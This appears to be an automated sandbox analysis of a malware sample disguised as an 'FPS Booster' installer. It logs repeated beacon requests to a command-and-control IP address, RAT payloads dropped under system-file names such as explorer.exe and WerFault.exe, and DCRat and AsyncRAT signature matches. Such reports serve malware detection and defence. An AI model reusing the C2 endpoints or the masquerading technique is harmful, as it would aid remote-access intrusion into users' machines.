                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: 188.120.228.203
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 188.120.228.203
                    Source: WerFault.exe, 00000011.00000002.1426473572.0000000002851000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002869000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.120.228.203
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002845000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.0000000002868000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.0000000002438000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.0000000002599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.120.228.203/MathpoolCam/ru
                    Source: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1518926243.0000000000AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.120.228.203/MathpoolCam/rulemessagerecord/screeX
                    Source: explorer.exe, 0000001B.00000002.1777779055.0000000002599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/cores
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp, FPS Booster 2.0.7.exe, 00000007.00000000.1351054556.0000000000409000.00000002.00000001.01000000.00000009.sdmp, FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://ocsp.sectigo.com0
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002851000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fps-booster.com/api/software/download?branch=master&bits=x64get
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpsbooster.ru/api/en/booster/install?is_agree=0https://fps-booster.com/api/software/download
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpsbooster.ru/api/en/booster/install?is_agree=1/NOCANCELpost
                    Source: WerFault.exe, 00000011.00000002.1426473572.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: https://sectigo.com/CPS0
                    Source: explorer.exe.5.drString found in binary or memory: https://steamcommunity.com/profiles/
                    Source: FPS Booster 2.0.7.exe, 00000007.00000002.2601726422.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ccleaner.com/ru-ru
                    Source: FPS Booster 2.0.7.exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004050F9
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Users\Default\WmiPrvSE.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\regedit\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,7_2_004038AF
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\SysWOW64\MsRdpWebAccessJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\SysWOW64\MsRdpWebAccess\ee201eac4591f0b16735de891f3d31be299085b8Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\regeditJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\regedit\explorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile created: C:\Windows\regedit\7a0fd90576e08807bde2cc57bcf9854bbce05fe3Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3D2680_2_00F3D268
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F336980_2_00F33698
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3EE300_2_00F3EE30
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F32F600_2_00F32F60
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3F1C20_2_00F3F1C2
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3F2B60_2_00F3F2B6
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 5_2_00007FF887B304525_2_00007FF887B30452
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 5_2_00007FF887B2C8985_2_00007FF887B2C898
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 5_2_00007FF887B2EFFA5_2_00007FF887B2EFFA
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeCode function: 5_2_00007FF887B2E81B5_2_00007FF887B2E81B
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_0040737E7_2_0040737E
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406EFE7_2_00406EFE
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004079A27_2_004079A2
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_004049A87_2_004049A8
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeCode function: 23_2_00007FF887B250BA23_2_00007FF887B250BA
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: String function: 004062CF appears 57 times
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156
                    Source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UNFOT5F1qt.exe
                    Source: UNFOT5F1qt.exe, 00000000.00000002.1457006922.0000000002A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs UNFOT5F1qt.exe
                    Source: UNFOT5F1qt.exe, 00000000.00000002.1470247095.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs UNFOT5F1qt.exe
                    Source: UNFOT5F1qt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
